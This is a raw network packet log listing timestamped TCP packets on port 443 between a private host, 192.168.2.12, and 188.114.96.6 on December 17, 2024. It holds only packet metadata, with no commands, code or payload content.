                                                                        Dec 17, 2024 08:38:45.194776058 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.194797039 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.194858074 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.194865942 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.194909096 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.194909096 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.199225903 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.199245930 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.199342966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.199352980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.199393034 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.203250885 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.203272104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.203337908 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.203346014 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.203408003 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.207129002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.207153082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.207241058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.207241058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.207248926 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.207336903 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.370563030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.370594978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.370654106 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.370666027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.370806932 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.374393940 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.374416113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.374515057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.374515057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.374521971 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.374640942 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.378199100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.378216028 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.378330946 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.378338099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.378396988 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.382972956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.382991076 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.383060932 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.383069038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.383187056 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.386773109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.386789083 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.386851072 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.386857986 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.386934996 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.391258955 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.391283035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.391354084 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.391360998 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.391424894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.391424894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.395976067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.395997047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.396316051 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.396325111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.396404982 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.399853945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.399869919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.399985075 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.399985075 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.399995089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.400100946 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.562216997 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.562247038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.562398911 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.562413931 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.562460899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.565984011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.566004038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.566153049 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.566169977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.566307068 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.570749044 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.570765972 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.570878029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.570878029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.570887089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.570941925 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.574580908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.574599028 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.574670076 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.574676991 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.574806929 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.579303026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.579327106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.579479933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.579479933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.579489946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.579607964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.583759069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.583779097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.584074974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.584085941 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.584230900 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.587686062 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.587704897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.587857008 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.587867022 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.587918043 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.592395067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.592411041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.592462063 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.592469931 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.592520952 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.754893064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.754923105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.755031109 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.755031109 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.755043030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.755228996 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.758703947 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.758733034 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.758779049 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.758918047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.758924007 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.758975983 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.763436079 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.763465881 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.763525963 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.763534069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.763593912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.763593912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.767281055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.767307043 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.767457008 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.767457008 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.767467022 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.767831087 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.772175074 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.772237062 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.772428989 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.772428989 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.772435904 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.772542000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.776052952 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.776130915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.776171923 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.776184082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.776256084 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.776256084 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.780342102 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.780365944 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.780637980 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.780656099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.780726910 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.784184933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.784207106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.784331083 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.784339905 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.784550905 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.297957897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.297975063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.298021078 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.298089027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.298101902 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.298149109 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.299114943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.299144030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.299191952 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.299199104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.299216032 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.299237013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.300786018 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.300811052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.300888062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.300888062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.300894976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.300939083 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.301856041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.301875114 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.301909924 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.301913977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.301950932 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.302736044 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.302747011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.302777052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.302824020 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.302829027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.302901030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.303224087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.303247929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.303275108 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.303280115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.303307056 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.303318977 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.304195881 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.304220915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.304265022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.304270029 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.304303885 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.305208921 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.305229902 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.305305004 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.305310011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.305349112 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.312781096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.312808990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.312880039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.312886953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.312933922 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.314305067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.314325094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.314383030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.314392090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.314404964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.314425945 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.315362930 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.315382957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.315423965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.315428972 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.315462112 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.315479040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.316231966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.316257954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.316291094 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.316297054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.316335917 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.316768885 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.316790104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.316828966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.316837072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.316847086 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.316874027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.317653894 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.317701101 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.317711115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.317715883 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.317749023 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.318732023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.318754911 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.318784952 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.318795919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.318837881 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.319622993 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.319647074 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.319681883 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.319690943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.319721937 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.333611965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.333643913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.333688974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.333708048 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.333750010 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.337080956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.337104082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.337183952 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.337193966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.337225914 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.341844082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.341861010 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.341924906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.341933012 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.341969013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.345658064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.345679045 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.345774889 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.345783949 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.350445032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.350476027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.350524902 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.350549936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.350585938 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.354818106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.354841948 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.354883909 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.354890108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.354927063 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.358786106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.358814955 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.358887911 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.358905077 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.358915091 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.363430023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.363454103 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.363504887 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.363513947 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.363533974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.406204939 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.525401115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.525434017 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.525501966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.525518894 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.525540113 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.525561094 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.530056000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.530081987 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.530147076 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.530154943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.530189991 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.533885002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.533912897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.533947945 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.533957005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.533991098 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.538625956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.538655996 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.538685083 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.538692951 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.538768053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.538768053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.542510033 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.542541027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.542577028 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.542587042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.542623043 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.546936035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.546957970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.547085047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.547096014 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.547159910 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.551645041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.551671982 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.551711082 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.551719904 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.551758051 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.555547953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.555568933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.555610895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.555620909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.555656910 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.717964888 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.718007088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.718108892 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.718122005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.718159914 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.721884966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.721916914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.721956015 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:46.721961021 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:46.722014904 CET49716443192.168.2.12188.114.96.6
